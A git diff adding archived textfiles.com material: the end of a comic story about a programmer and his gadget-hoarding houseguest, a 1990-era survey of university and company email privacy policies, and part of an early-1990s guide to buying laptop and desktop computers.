of someone who doesn't work with computers +<> living in the same house. The very idea causes +me to break out in hives and carbuncles from the top of my +godlike head to the bottom of my hairy, but prehensile toes. +Not to mention what it does to my teeth and gums. No, +you're sleeping on the first floor won't do at all. I'll be +a nervous wreck by the end of six months. You'll have to +live in the attic from now on." + + "Six months?" Andrew.BAS gasped. Suffering the loud- +mouthed electronics elitist for six hours was hard enough, +but six months? He cringed. O, why had he offered him a +place to sleep in the first place? He should have suspected +this might happen. It was after midnight, though, and the +meek programmer was too tired to argue. Reluctantly, he let +his officemate have the first floor to himself, and headed +up the attic stairs with his own blanket and clock radio. +He vowed to kick out the Gasconian houseguest first thing in +the morning. + + As the programmer drifted off to sleep, cramped in a +corner of the attic on the floor, behind a computer box, he +thought he heard S-max's anarchic van squeeling out of the +driveway on rubbery wheels. But he put it out of his mind +and fell asleep. A short while later he awoke to the squeel +of the van pulling back into the driveway. This time it's +distinguishing rattletybang was accompanied by a wood-on- +concrete scraping. It almost sounded like a herd of broken +furniture was being dragged along behind it. Was it? +Andrew.BAS, tossing awake in the darkness, fretted, but +before he could make sense of the scraping noise, he fell +back asleep. He dreamed he was caged inside a supercomputer +where, behind every logic gate, stood a bossy, chip puller- +wielding giant with a big nose like S-max's and who spoke +with an excessive amount of non sequiturs. He awoke with a +start to hear what sounded like someone in large sneakers +running through the overgrown weeds and grass in the +background, winding electrical cords around trees and +bushes. + + When Andrew.BAS's clock radio finally trilled a few +hours later, he tiptoed down the stairs warily, terrified at +the prospect of what mischief he might find waiting for him +in the house below. Reaching the bottom of the stairs, he +noted that the livingroom looked still. His guest was +curled beneath his space-ship sprinkled blanket like +innocence itself. Even his snoring sounded remarkably +harmless. But what was he sleeping on? Andrew.BAS stepped +closer to see. It was a long cushion. It's conspicuously +kitschy brown plaid naugahyde could mean only one thing: it +was a seat cushion ripped from a $4 billion Cray +supercomputer! The programmer started. It was as though he +had stumbled on a dead body. Where would S-max have gotten +a billion-dollar supercomputer seat cushion? he wondered. +And what did he do with the rest of the computer? + + Turning to the kitchen he spied at least part of the +answer. In the spot once occupied by the sink, the stove, +and the broken dishwasher, there now stood a battered PDP-1 +computer. It winked at him with the kind of crazy, +insouciant grin that only comes from a rusty machine that +that has been refitted with $4 billion parts. But the fact +that S-max may have sacked a Lambourghini to soup up his +jalopy was the least of the programmer's concerns, for +looking around, he saw that the rest of the house was so +thick with transistor-encrusted, wire-wrapped contraptions +that it would take nothing less than a six-month power +outage to get the wire-fisted squatter to leave. Helpless, +the apple-cheeked programmer sat down on a stack of sci-fi +novels and sighed. + + + + + +>>>>In the next episode, "The Ghost of Alan Turing," monkish +assembly language wizard Austin Jellowack is pestered by an +unwelcome pal from a higher programming realm.<<<< + + + diff --git a/textfiles.com/computers/email b/textfiles.com/computers/email new file mode 100644 index 00000000..cdb7f52b --- /dev/null +++ b/textfiles.com/computers/email @@ -0,0 +1,456 @@ +Policies on electronic mail - a summary +--------------------------------------- + +Attached is an edited summary of the responses I received on my recent +query. + +The majority of respondents didn't have a formal mail policy, although +there was some unspoken agreement on it. + +At least one formal mail policy is attached. Some organisations seem +to have come to grips with the problem extremely well - as the following +(rough) quote from the Sun Microsystems internal handbook 'Email Survival' +illustrates. + +'Accessing another persons personal electronic mail or files without +their specific permission is considered gross misconduct. The ease with +which this might be done in no way justifies this intrusion. Printed copy +awaiting pickup from a printer is equally confidential material. Any +misconduct of this type may result in the termination of your employment +with Sun'. + +Thanks to all who helped out. Also, some people requested anonymity +so I decided it would be best to strip out all identifying information +from the summary. If you would like to discuss something with any +particular correspondent, no doubt I can arrange it! + +-- +Todd Hooper (Postmaster) Computing Centre + Curtin University of Technology +Internet: hooper_ta@cc.curtin.edu.au Western Australia +ACSnet : hooper_ta@cc.cut.oz.au +Phone : +61 9 351 7467 (24 hour messaging system) Fax +61 9 351 2673 + +--- Comments from commercial site administrators and users --- + +We take e-mail very seriously -- both on our own systems and on those that +we administer on behalf of our clients. I view e-mail in the same light as +paper mail. Accordingly, we make every effort to ensure timely delivery +and privacy. Our staff are encouraged to use the facility and we make no +distinction between business and personal correspondence. + +We are sufficiently small that abuses of this privilege can be dealt with +at a personal level. In the three years that we've had network access, +only one user has been troublesome. In this case, the user was sending +inappropriate quantities of data via the e-mail system and that person has +been encouraged to seek alternative methods (magnetic media) of data +interchange. + +So far, I have not found it necessary to formulate written policy on this +subject although recent activities that have been reported in the U.S. +have prompted me to consider doing so. + +--- + +[1] We're a commercial site, an employee-owned firm. + +[2] All email is private to the extent we can make it so under fairly +standard System V setups. Directories for spooling are locked, although +a dedicated person could probably find a hole somewhere. Privacy is +only knowingly compromised when a user needs file repair, and even +then the user is warned that someone will probably see the mailfile +or spooled message as surgery if performed. + +[3] We don't consider net-correspondence or personal routing to be a +problem. In fact, we helped an employee figure out a path to his +daughter during the summer. + +[4] Nobody at our site has precipitated a net flame-war, so the issue +of abuse has not come up. Were it to occur I suppose we would give +the party in question a reprimand on the first offense, and we would +have to handle additional problems on an ad-hoc basis. We try to +be flexible; so far we haven't [KNOCK WOOD] had a major test. + +-- + +This is certainly [not] an official educational mail policy, it is merely a +note reguarding my experience. + +Although I realise that you, as a systems administrator, have a duty to +maintain security on your site, particularly now with AARNet connectivity, +I feel that the reading of someone elses personal mail is a gross injustice. +Despite the fact that you probably have every right to read the mail (they +have chosen to place them on your machine), it is degrading and leads to +animosity between staff and students. As a sysadm myself now, I will +never read someones mail even if i suspect them of breaching security. + +--- + +On mail abuse. Of all organisational e-mail setups I've come +across (not that many, but I think sufficient to make correlation), +at least 30% of all intra-orgainisational email traffic is +of a social nature. + +In one instance, numerous mis/comms managers of a major international bank +that I've dealt with confessed, under social/relaxed settings that they +reckon more than 1/2 of all mail in their system were invitations, replies, +greetings and felicitations and such like. They were using IBM/Profs and +a population of ~7000 users worldwide. + +My thought: I don't think there is any feasible active policy +you just have to rely on your employees to be professional about it. + +--- Responses from academic site administrators and users --- + +As far as we are concerned e-mail and e-news is there to be used, the more +students use it the better since they begin to use the computer systems +voluntarily.. not just to do their projects. +(some of them are even buyng e-mail accounts on commerical systems) + +There aren't any charges or accounting.. + +--- + +I've had no problems here in ******. Hopefull, the mail is +private. there have been no rules set down for the use of +personal mail, and in fact one of the groups I use could +only be called personal. The news also is personal I guess, +as alt.sex or such could hardly be called work! (something +for tea breaks). + +There is of course lots of official things passing through, +and who determines what is personal and what is strictly +university work? + +--- + +No official policies at ******. In general, anyone (staff or student) is +permitted to use mail to anywhere. + +Privacy - people are warned that mail is not secure and confidential +information should be sent by other means. + +Abuse - the universal threat: misuse of computer systems may result in +disabling of accounts (and consequent failure for students because of +inability to complete assigned work. We always warn people, and one warning +has proven sufficient so far.) + +Personal messages - no rules, just the general statement that applies to +computing generally "People doing University work have priority for use of +terminals, etc". This is sort of enforceable, in the sense that anyone +wanting to use a terminal can complain to the person doing private work, and +then to the system manager if necessary. We rarely have complaints. As far +as checking for private mail, there are hundreds of messages a day go from +here, and I don't have the time or inclination to read it. I don't really see +any problems with people sending private messages, after all, universities are +supposed to be places of open thinking, etc, etc, etc. (It would be different +if it was costing us anything, such as people printing out dozens of +invitations on our laser printer!) + +--- + +.......................................There is no point in adopting +rules you cannot enforce. In particular there is no way of enforcing rules +agains the use of email for personal messages unless you want to adopt the +distastful and tediously boring practice of reading all messages. + +New computer users are given a statement describing their +computer access as a privilege, not a right, and with some guidelines as to +proper use. There is always the implication that if they abuse their privileges +they can lose them. If a user starts sending abusive email, you would probably +hear a complaint from the recipient and could take action. If users send +multi-megabyte email messages you (or your postmaster) will probably see the +error messages when they bounce, and again can take appropriate action. In +our case appropriate action is usually a warning, followed up by account +suspension in the rare cases of repeat offenders. + + As for privacy of email, I follow the practice that in principle email should +be private, but that in practice they should not assume this. I post occasional +warnings that I as postmaster, and presumably postmasters at other sites, will +sometimes see a copy of their mail when an error occurs, sometimes due to no +fault of the sender. I also inform users that system administrators technically +have access to all files on the system, and may occasionally need to read user +files to resolve system problems. + + My personal policy is to never divulge the contents of email I happen to see, +even when that email contents suggests gross abuse. However I have no +such hesitation in divulging information obtained from system log files, which +list such information as sender and recipient addresses, message length, etc. +Since these log files are publicly readable (even though most users do not even +know they exist), I consider them public information. + +--- + +There has been a discussion on TECHREP@BITNIC.BITNET on electronic mail +privacy/policy lately. If you are not a TECHREP, I would suggest you +subscribe to TECHNEWS@BITNIC.BITNET as it is an open re-distribution of the +TECHREP list. + +Send your subscription request to LISTSERC@BITNIC.BITNET in a mail message +with the first line being "SUB TECHREP (or TECHNEWS) " + +I enclosed a copy of a message that may be of intrest to you that appeared +earlier this week..... + +=-=-=-=-=-=-=-=-=-=-=-= From SYSTEM NOTEBOOK C0 =-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +>----------------------------Original message---------------------------- +>On Tue, 30 Oct 90 15:03:22 GMT said: +>>Could anyone tell me if there is a published statement concerning +>>the privacy or non-privacy rights of electronic mail on Bitnet? +>> +>>We are going to be granting access to all our students, and our +>>attorneys have suggested that we should have a published statement +>>concerning this matter. +> +>We are currently preparing a system/network usage policy document +>to inform our students (and other users) regarding what will be +>considered 'abuse', etc. We plan on including these statements: +> +> +> *** IMPORTANT INFORMATION *** +> +> Pursuant to the ELECTRONIC AND COMMUNICATIONS PRIVACY ACT of +> 1989, TITLE 18, UNITED STATES CODE, Sections 2510 and following, +> notice is hereby given that there are no facilities provided by +> this system for sending or receiving confidential messages. The +> System Administrator and assigns may read all messages and files +> of any user. +> +> +> Computer accounts are paid for by the State of Texas and are for +> educational purposes ONLY. In general educational use is +> interpreted loosely. But, use for economic gain or computer or +> network abuse will not be tolerated. If there is a complaint +> regarding your usage of networks or UTA computers, UTA Academic +> Computing Services has the right and will review trace +> information, backups, and your account contents to determine your +> complicity. Possession of command files that are solely for the +> purpose of pestering other persons or having blatently obscene +> material in your accounts, are generally considered just cause for +> administrative action against you. You do NOT have a right to keep +> these types of materials on UTA computers. +> +> +>We would appreciate any feedback on possible problems with these +>statements. +> +>Thanks, +>Bob Carr +>Manager of Systems Support +>UT Arlington +> + +--- + +I'd be most interested in a summary. The official policy at ***** is +that we have to use our computer accounts for "educational pursuits" +(or equally legal sounding stuff). A fairly high level of privacy +exists, although the university reserves the right to read our email. + +--- + +There are paragraphs alluding to many aspects of the e-mail issue +in various Internet RFC documents (I can't cite them by chapter and +verse off-hand, but one that comes to mind is the Security Policy +Handbook that is in fairly advanced draft right now ... it is +prepared by the Secuirty Policy Handbook Working Group (SPWG) and +you can get it by anonymous FTP from cert.sei.cmu.edu (look for +an "obvious" subdirectory). + +Let me advance the following by way as a rough guess at to what you +will find: +(1) Many sites will have no official policies. +(2) Some sites will have official policies prepared to satisfy the + legal staff and bean-counters: these policies will sound very + nice and complete but in fact be largely impractical to + implement. +(3) Some sites will have policies based on experience and knowledge + of the technical staff: these policies will point out that e-mail + ain't secure unless encrypted and that security is inversely + proportional to ease and convenience of use of a system. + +I suspect, too, that the top levels of administrations that tend to +think in terms of official policies, are also the ones who least +understand the technology and what really can and can't be done. + +--- + +I am sysadmin of ******** + +We have 70+ users. + +We have no policy in place. + +Users are free to use email for whatever purpose they like. + +and they do use it. + +We use standard Unix mail which means each user's mailbox is private +with the exception of root, who can look at anyone's mail. + +--- + +It was interesting that you should raise this on info-nets. So I +would like to share with you my thoughts on the subject, having worked +and researched in the human factor in global email since 1982. + +I think that the coming of AARNet and the tremedous promotion work +that Geoff Huston and his group is doing will advance the use of +email in Australia. It mighe not be a good idea at this early stage +to insist that email should be used for "official" business, as it +will be extremely difficult to define what is official, work, and what +is personal and private use. To do so will dampen the learning and usage +enthusiasm of the lay people. I have been a member of a number of overseas +conferencing systems, and quite frankly, a lot of the messages have only +social values, but they are important all the same, as they are crucial +to group dynamcis and group affinity. + +--- + +OK, here's the Dartmouth policy plus a disclaimer from the manual +for the Dartmouth-developed e-mail application: + + DARTMOUTH COLLEGE COMPUTING CODE OF ETHICS + +The Computing Code of Ethics was formulated and is endorsed by +Dartmouth's Council on Computing, a faculty committee that +advises Dartmouth on questions of policy concerning the +allocation and use of all computing resources. The council takes +an active role in determining the standard computing environment +on campus and participates in planning and reviewing projects +that will significantly affect computing at Dartmouth. The +Council on Computing wholly endorses the Dartmouth Computing Code +of Ethics as follows: + +Computer use. The Computing Code of Ethics states that every +user of Dartmouth College Computing has two fundamental rights: +privacy and a fair share of resources. It is unethical for any +other user to violate these rights. Violation of the Computing +Code of Ethics is considered a violation of the Academic Honor +Principle and may subject a student to disciplinary action. + +Kiewit Network privacy. Each user number and associated password +belongs to an individual, department, or school. No one else +should use a user number without explicit permission from the +owner. All use should be in accordance with Dartmouth policy on +computer use set forth in this document. Owners accept the +burden for the responsible use and dissemination of their user +number. + +Programs and files belong to the owner of the user number or +catalog containing the programs and files. They are presumed to +be private and confidential unless the owner has explicitly made +them available to the public. When necessary for the maintenance +of a system or network, Kiewit Computation Center personnel may +access others' files. + +Some programs gather information about the users who run them. +If such information could be used to identify the user and the +user's use of the program, the user should be warned and given a +chance to leave the program before data collection begins. + +Use of a the network and/or electronic mail facilities for +transmitting rude, abusive, harassing, or malicious messages is +unethical. + +Personally owned computer resources. The unauthorized copying of +any software that is licensed or protected by copyright is theft +and thus unethical. + +Programs and files that belong to the owner of a personal +computer enjoy the same rights of privacy afforded to programs +and files resident on the Kiewit Network computers. They are +presumed to be private and confidential. + +Resources. No one should deliberately attempt to degrade Kiewit +system, network, or personal computer performance, nor to deprive +other users of the resources of or the authorized access to any +Dartmouth- or individually-owned computer. + +Loopholes in the Kiewit computer system or network or knowledge +of a special password should not be used to damage computer +systems or networks, to obtain unauthorized resources, or take +resources from other users. + +No Dartmouth-owned computing resource should be used for +unauthorized commercial purposes. + +When necessary for the maintenance of a system or network, Kiewit +Computation Center personnel may restrict availability of shared +resources. + + ELECTRONIC MAIL INFORMATION + (Not Part of the Computing Code of Ethics) + +Privacy information. The privacy of electronic mail is somewhere +between that of a letter and a postcard. Electronic mail is not +entirely confidential. There may be instances where the +postmaster may have to gain access to a message to determine if +something is wrong with the address, or the message may be +delivered inadvertently to the wrong address. + +-- + +I'm the postmaster here for the Department of Computer Science, +and thus for a bunch of student systems as well as the staff network. +We don't really have an official policy that I know of for electronic +mail, but I think some of the unofficial ideas we've been working with +may be of interest to you. I'm interested in any other replies you +receive, so if you don't get enough to post to the net, could you email +me a copy please ? + +During the period ******* through to *******, network access for students was +completely open. They were allowed to send mail anywhere they liked, and +FTP from the States, telnet into machines over there and try to break into +people's computers :-(. + +At some point this "feature" was mentioned to the bigwigs here, who +immediately determined that undergraduate students should not have +AARnet access. The very idea of undergrads being able to send mail +overseas was quite unthinkable. Naturally, the implementation of such a +restriction required a bit of thought, because students do need access +to utilities like telnet and so on to communicate between machines on +campus. Eventually we decided to try not running routed on the +machines, thereby making attempts to reach systems outside the +physically connected network return the message : Network unreachable. + +This has been fairly successful, although because our campus network is +subnetted, we have needed on occasion to add a special static route +into Multigate boxes to talk to Macintosh labs and so on. The one big +disadvantage of it is that no-one on the machine can reach off camous, +so staff users can't mail overseas from such a crippled machine, for +instance. Apart from trying to follow the commandments of the +powers-that-be, we were also pleased to be able to stop students from +FTPing vast numbers of raster images from US sites. (Since disk quotas +were mistakenly not turned on at the beginning of the semester, I mean +VAST numbers). + +In any case, although I've never sighted an "official" policy or even +an official memo telling us what we should and should not let the +students do, I thought you might find what we've been doing +interesting, since it is my vague understanding that not many other +AARnet member sites are restricting student access (?). + +[deleted] + +Your message also mentions other issues such as mail abuse, privacy of +mail etc. Again we don't seem to have a clearcut official policy +although we do have a "Principles of Responsible Use" document which +students are expected to pay some attention to. It explicitly says +"users should not...attempt to intercept any network communications, +such as electronic mail...". It goes on to say "Actions taken by users +intentionally to interfere with or alter the integrity of the system +are out of bounds. Such actions include ...impersonation of other +individuals in communications...". I think that this document is a +locally written thing, and isn't circulated to the other larger student +site on campus. + +As far as privacy of mail goes, I was quite surprised to hear most of +our lecturers agreeing that as far as they were concerned, students' +mail was an "open book". Some of the first year lecturers in particular +are very concerned with plagiarism, and seem to often browse through +student mailboxes to try and detect it. I'm pretty sure that they want +to treat it as an open book, but have no intention of telling the +students that that is the case. As a postmaster, my immediate reaction +is that such an attitude is rather unethical. diff --git a/textfiles.com/computers/equip.txt b/textfiles.com/computers/equip.txt new file mode 100644 index 00000000..d07b9eee --- /dev/null +++ b/textfiles.com/computers/equip.txt @@ -0,0 +1,791 @@ + + ---------------------------------------------------------------- + + PURCHASING A LAPTOP COMPUTER + + ---------------------------------------------------------------- + + There is an allure to purchasing a laptop computer. They are + small, sleek and highly productive. What features should you + consider when purchasing a laptop? For those who need quick + highlights first we'll present a brief overview for the cautious + laptop buyer. Later in this tutorial we'll shift gears for a + broader "beginners" overview. + + Before jumping into our tutorial, a reading recommendation. + Visit your local library and locate a back issue of the August + 1992 edition of PC Magazine. That issue covered a variety of + reviews concerning specific laptop machines and also contained + some surprising suggestions for productive laptop use. While on + the topic of pertinent reading, check for other useful titles in + the reading list section elsewhere within this tutorial. + + Next, general suggestions for laptop buyers... + + 1) The keyboard is the most important interactive part + of any laptop. Is it awkward? Could you use it for longer than + 15 minutes? An hour? A complete morning at work? Note the + location of frequently used keys like the backslash \, the F1 + function help key, the cursor control keys. Some oddball laptops + require you to use a shift-funtion key combination for cursor + keys. Not terribly comfortable. Othertimes the cursor position + keys are oddly laid out in a non standard pattern which is + difficult to use and memorize. One of the classic keyboard + layouts is the Toshiba 286 T1200XE. Glance at the layout on this + machine and compare it to your target laptop. + + 2) The screen. Next to the keyboard this is the greatest delight + - or pain - when it comes to using a laptop computer. Can you + use it for longer than an hour? Screens can be either backlit or + edgelit. Each has advantages. Try both and see which you like. A + few clever laptops have screen reversing software built in which + can change the screen from black lettering on a light field to + light lettering on a dark field. Helpful for some folks. Ask if + your target machine has it. Find out if you like it. Is the + output VGA (display and run most software) or lowly CGA (run + and display fewer packages?) Is there a port on the back so you + can plug in your big monitor to the back of the laptop when you + are home or at the office? Do you need to buy an adapter for + this? On an airplane tray can the screen be tilted so that the + seat in front does not bump into the screen edge? + + 3) Weight. Fully outfitted with adapters, disks and batteries, + what is the real "workday" weight of the laptop? Load the + machine and accessories into a carrying case and heft it for a + while. Brochures proclaim extremely light weight figures - in + real life you will carry the computer and accessories. + + 4) Price. Determine the REAL price. You will need an AC + adapater, carrying case and probably spare battery as a minimum. + You will need DOS and some software. Beyond that, most people + need a few manufacturer specific cables and sometimes a modem. + Add it ALL up. + + 5) Battery life is a touchy subject - ultimately the attraction + of laptops is the opportunity to get work done on the road. + Battery life of an hour or so isn't much real work, when you + think about it. Two to four hours on a fully charged battery is + a working range today. Ask if the laptop has special battery + saving features such as sleep mode, pause and resume, user + selectable delays for drive and screen refresh use, powerdown + mode, capability to change batteries without shutting down the + machine and loosing data. Nice features. Is it easy and FAST to + change batteries or a real chore? Look at the clasps and snaps + as you open and close the battery compartment. + + 6) Modems. Someday you will need one. Does the laptop have a + standard serial modem slot to which any low priced modem can + be attached or a proprietary manufacturer specific slot to which + ONLY that manufacturer's (expensive) modem will attach? For a + few extra dollars consider a modem with combined internal fax + send and receive capability which is a godsend for travellers. + Much cheaper in the long run than paying your hotel $6 per page + to transmit and receive faxes. + + 7) How much memory can you add to the laptop? For light word + processing and spreadsheet work 640K may be all you need. But + serious software use, Windows use or high end graphics may + require 2 or more Megabytes of memory. How much can you install + into the machine? How much will it cost? Can you install the + additional memory or must the factory? + + 8) Drives. A standard 3.5 inch floppy drive is almost essential + today. A hard drive, too, if you can afford it. If the laptop + has no floppy, you might need to purchase special software and + cables to transfer files between your laptop and desktop + computer. One more expense. Back to the hard drive for a moment: + if you work with large mailing lists, huge databases of clients + or unusually large spreadsheets you MUST have a hard drive with + larger than average capacity. Between 40MB to 100MB would be a + wise investment for hard drive intensive storage applications. + + 9) Details. Beyond a serial port (for the modem or mouse) does + it have a parallel port for a printer? How about capability for + an external keyboard? Slot for math coprocessor? Null modem + cable for transferring data between other computers. + + 10) Form follows function. If you plan to use the laptop mostly + as your PRIMARY machine at home and work, focus on maximum power + and expandable features. If you are a power user of Windows and + graphics software you will need VGA display, at least 2MD of ram + and at least a 386SX processor. However, if your primary work is + spent on the road in planes and trains, pay attention to long + battery life and quickly interchangeable battery packs. + + 11) Consider the new breed of tiny portable printers which work + well with laptops. Included are the Diconix 150 Plus which + weighs in at 3 pounds, Canon BJ-10 Bubblejet, Citizen PN48 and + Star Micronics StarJet SJ-48. All printers will need spare ink + cartridges, printer cable, paper, AC power supply and spare + batteries. + + A brief glance at portable computer configurations.... + + Laptops are for the most part single-piece computer systems + weighing in at between 7 to 15 pounds. In most cases the viewing + screen opens in a characteristic "clamshell" manner. All are IBM + compatible and most will functions from AC or battery power. + Most offer some expanability in memory and some, but not all + will even accept an expansion board. The latest designs can + mater to a "docking module" which adds powerful desktop features + when the units are used in a stationary office setting. Prices + range from about $700 to well over $5,000 for advanced models. + Examples: the Toshiba T4400SX, Librex M386SL, Bondwell B-310SX, + Dell 320LT. + + Notebooks weigh in at 4 to 7 pounds and usually feature both AC + and battery power. Both hard drive and floppy drive models are + available. Prices range from $700 to about $2,000. By far + notebooks are the most popular category in the consumer + marketplace and for most users have the best balance of weight, + cost and features. Examples: Epson NB3, Dell NX-20, Tandy 1800 + HD, Sharp 6220, Tandy 110 HD, NEC 286F UltraLite, Compaq LTE286, + Toshiba T1200XE. + + Palmtops. The smallest of the small. Weighing in at a pound or + less these machines features minaturized keyboards, vestpocket + size, lack of hard or floppy drives and varying amounts of true + IBM compatability. Features are sacrificed in the quest for + miniaturization. Some, such as the Hewlett-Packard 95LX contain + built in software such as the standard Lotus 1-2-3 spreadsheet. + At this writing, only the diminuitive Poqet palmtop is equipped + to run most IBM compatable software. Tiny credit card sized + memory modules are available for some models. Prices range from + aobut $400 to over $2,000. + + Next, a broader tutorial about buying a computer for the first + time. A refresher course for the advanced. An eye opener for the + beginner. Some topic areas also address concerns about larger + desktop computers as well as smaller laptops - a broad base of + information is usually useful so references to desktop + computers has been included. + + Buying a new or used computer is always THE traumatic event. It + seems to be easier if you merely NEED one for a definite office + or productivity goal such as financial analysis or compiling a + mailing list of customers. In that case, you can be logical and + evaluate among several machines and take your time. If, however + you WANT one because it sounds interesting and you feel a little + lost when everyone in the neighborhood is discussing CPU WAIT + STATES, you have some serious research ahead! + + From a use standpoint, start at the beginning: What do you want + to do with the computer? What software applications will perform + these tasks? After determining answers to those two questions, + purchase as much computing power as you can afford which allows + you to use all current software of interest as well as retaining + the possibility of upgrading the machine later - more memory or a + better video display, for example. + + Simple applications like word processing, accounting and + telecommunications may run equally fast on both budget and high + end computers while sophisticated software such as drafting, + large databases and desktop publishing may run so slowly on a + low end computer that your wasted time far offsets the original + savings on the budget computer. When in doubt run several + software packages which provide features you want on the + computer in question. + + Three technical factors are of interest when purchasing a + computer: the type of CPU (central processing unit) which is the + brains of a personal computer, the speed of the CPU and finally + the choice between 8 bit and 16 bit CPU types. + + A brief refresher course: A bit is a binary digit used by + computers to store and process data. Typically 8 bits are needed + to construct a byte or computer character such as a number or + letter. Eight bit processors can process one byte or character + at a time. Sixteen bit processors can processor two bytes at a + time. Faster is better for most folks - although speed has its + price... + + In the IBM world of clone PC's there are four camps of CPU desire + and capability. + + On the low end of price and performance are personal computers + of the so-called XT class using the oldest processors such as + the Intel 8088 (8 bit data bus outside the CPU and 16 bit data + bus inside the CPU) which was used on the original IBM PC. The + Intel 8086 CPU, alternatively, provides both 16 bit internal and + external construction. A similar CPU is the NEC V-20 chip. + Advantages, disadvantages and uses for these XT class machines? + + XT's are affordable. A basic machine with a couple of floppy + drives, monitor and keyboard can be obtained for $300 to $400. + XT class machines are useful for small and home office work or + light hobbyist use such as word processing and accounting where + speed is not of great concern. Generally XT class machines, as + with all IBM clones, can be upgraded by the gradual (or + immediate) addition of hard drives, color monitors and even + faster processors. As a curious aside, this software package was + programmed and edited entirely on an XT class machine. In a + sense computing power does not derive from the machine, but HOW + you use it! + + When is an XT not a good buy? If you intend to do CAD drafting, + work with large database mailing list, or high resolution + graphics, an XT is not a wise choice. If you ever to run + the OS/2 operating system or Microsoft Windows which are + advanced operating and display standards, XT machines are not a + good idea. Finally, if you intend to expand the machine to + color graphics such as an EGA or VGA standard or install large + amounts of memory an XT is probably not an ideal choice. + + One step up the ladder in performance and price is the AT class + machine which runs an Intel (or alternate manufacturer) 80286 + CPU chip. The machine is usually 2 to 4 times faster than an XT + class machine at perhaps $200 more in price. For most people an + AT class machine is a comfortable choice since it can not only + run OS/2 and Windows (albeit sluggishly) but also run earlier + software programs at greater speeds. AT class machines are + considered a "plain vanilla" standard in most office environments + and are usually sold with hard drives and additional memory as + standard equipment. + + The 80286 processor also operates in two modes which the 8088 + and 8086 cannot: REAL MODE which allows the 80286 CPU to work + like an 8088 CPU and PROTECTED MODE which allows access to more + RAM memory. In theory, the older 8088 CPU chip can address up to + 1 Megabyte of memory. An 8088 CPU always operates in real mode. + + In protected mode, however, the 80286 CPU can use up to 16 + Megabytes of memory which can be an advantage in running both + larger, more sophisticated programs as well as earlier programs. + In addition, the 80286 CPU can, with the proper software, run + several programs simultaneously which is know as MULTITASKING. + + The benefits of both protected mode and multitasking are + somewhat unrealized at present although certain of these + benefits can be obtained when running Windows software rather + than DOS. Because of this, most users who continue to run DOS + use an 80286 computer as a FAST device rather than seeking the + advantages of multitasking or protected mode operation. And the + 80286 is VERY fast indeed with some manufacturers pushing the + CPU to speeds of 25 Mhz. + + Generally, adding additional upgrade equipment such as EGA + monitors and laser printers is a good investment with an AT + machine but a poor idea with an XT machine. The AT machine uses + a 16 bit bus structure for rapid data flow while the older XT + class machine uses a more primitive 8 bit bus. + + AT class machines run graphics and CAD programs relatively + quickly. Hard drives operate quickly on an AT class machine with + its larger 16 bit bus. It is a good choice for the small home + office doing word processing, accounting, light desktop + publishing, medium sized database mailing lists and so forth. + + Still higher up the food chain are 80386 and 80386SX CPU + equipped machines which are still faster and provide a few more + whistles and bells. They can run software which XT and AT class + machines run, only FASTER. They are the machines of choice for + office LAN networks, intensive graphics, CAD programming, + Windows, OS/2, compilers and other number intensive programs. + + Curiously, though, the 80386 data bus remains 16 bits wide in + most of these machines and there is no "OS/3" operating system, + so the performance you derive is speed without additional + whistles and bells. For most users, a "386" machine is mostly an + office computer which a home or hobby user might admire but + rarely need. + + Intel corrected the problem of switching from real mode to + protected mode - a design flaw of the 80286 - and added a third + mode called virtual mode which allows the CPU to act as if + several "separate" 8088 computers are all running within one + machine. In addition the 80386 chip is a true 32 bit CPU which + processes four bytes or characters at a time. This 32 bit + structure effectively makes the 80386 CPU twice as fast as the + 80286 CPU. Finally, the 80386 can directly address a whopping + four gigabytes of memory if available which is 256 times larger + than the amount of memory the 80286 can address! The downside is + that many of these advantages cannot be realized when running + DOS. Windows or OS/2 operating systems provide access to these + advanced features. Speed and additional memory capability is the + primary byproduct of operating an 80386 within a DOS environment. + + The 80386SX is an affordable variant of the 80386 CPU. The key + difference is that it uses an EXTERNAL 16 bit data bus outside + the CPU which is similar to that used on conventional 80286 or + AT class computers. Internally it is quite similar to its big + brother, the 80386, and offers similar multitasking modes and + memory addressing. It can run all of the software the 80386 + machine can, albeit slightly more slowly. These design + compromises allow manufacturers to produce an affordable + computer with a good balance of speed and cost. For many users + needing a powerful computer which can run all current and most + future software, the 80386SX is an enviable balance of + performance versus price and offers superior memory management, + optimum speed and ability to run current and future software. + + The primary reason to select a 80386 over the 80386SX involves + the need for higher speed processing, ability to run 32-bit + software and advanced multitasking. + + Before introducing the fourth Intel CPU, the 80486, two new + concepts must be mentioned: memory caching and mathcoprocessing. + + As the speed of the CPU becomes faster, the RAM memory chips + where data is stored have difficulty moving data into and out of + the CPU. Memory caching involves special high speed RAM memory + chips - typically an amount from 64K to 128K - in addition to + the normal memory chips within the computer. These high speed + chips are expensive but keep data poised to quickly move in and + out of the CPU. Memory caching should not be confused with disk + caching which is another concept used when discussing hard + drives. + + A second way to increase performance is to install a math + coprocessor chip into the empty socket which is available on + most computers. This device shares the processing of specific + numeric operations which can slow the CPU. Only certain types of + software support math coprocessors such as some CAD, spreadsheet + and graphics software. Not all software benefits from the use of + a math coprocessor. + + The 80486 CPU combines the features of the 80386 chip plus the + addition of a self-contained on-chip coprocessor and memory + cache. Although the memory cache is small, a mere 8K, it is + extremely effective since it is onboard with the CPU itself. The + 80486 is useful for advanced scientific applications, CAD + drafting, graphics and high speed LAN (local area network) + shared computers in an office environment. + + An 80486SX CPU is also available which is essentially a "poor + man's" 80486 with a smaller external data bus. + + Back to CPU clock speed. Older XT (8088 CPU) machines operate at + a relatively slow speed of 4.7 to 10.0 Mhz or Megahertz. One + Megahertz equals one million cycles of electricity per second. + + AT class machines (80286 CPU) operate in regions of 10 to 25 Mhz + while 80386 and 80486 machines operate at speeds in the 20 to + 40Mhz region. Obviously faster is better especially when it + comes to colorful graphics displays, CAD drafting, large + spreadsheets and massive programming tasks. However simple word + processing, small business accounting and routine mailing list + management is more than adequate at 4.7 Mhz. The need for speed + is relative to the computing task at hand! + + Let's backtrack for a moment and discuss RAM memory. Most + computers are sold with a specific amount of memory installed on + the main "motherboard". Increments of 640K to 1Meg of memory are + common. It is commonly advertised that additional memory may be + added as "expandable on the motherboard" to some upper limit + such as 4Meg or 8Meg. Thus the user can easily install plug in + chips of SIMM's (single inline memory modules) to sockets on the + motherboard. If possible, insist on SIMM memory modules which + are simpler for the average user to install rather than earlier + DRAM chips. Additional plug in memory boards can also be + installed into computers having an 80286 or higher CPU. Up to 16 + Meg of RAM memory is possible on 80286 CPU equipped computers. + + Why install more memory beyond the 640K which DOS can address? + For fast memory caching, RAM disks, TSR installations, access + to programs which can use either or both expanded or extended + memory, to run the Windows operating system or 